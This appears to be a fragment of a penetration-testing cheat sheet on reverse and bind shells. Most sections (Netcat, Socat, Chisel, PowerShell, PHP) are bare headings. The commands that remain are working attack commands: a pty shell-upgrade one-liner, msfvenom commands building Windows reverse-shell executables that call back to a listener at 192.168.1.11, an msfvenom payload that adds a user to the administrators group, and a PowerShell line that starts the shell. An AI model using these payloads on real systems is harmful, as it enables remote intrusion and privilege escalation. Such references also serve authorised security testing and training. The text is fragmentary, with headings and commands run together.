Reverse/Bind Shells
Shell Generator
Upgrading a Non-Interactive Shell
python -c 'import pty; pty.spawn("/bin/bash");'
[Ctrl + Z]
stty raw -echo; fgMsfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f exe -o shell_53.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=443 -f exe -o shell_443.exemsfvenom -p windows/exec CMD="net localgroup administrators <USERNAME_TO_ADD> /add" -f exe -o file.exe> start-process -nonewwindow -filepath ./shell.exeNetcat Bind Shell
Netcat Reverse Shell
Socat Reverse Shell
Socat Encrypted Bind Shell
Chisel
PowerShell Reverse Shell
PHP Reverse Shell
LibreOffice




Last updated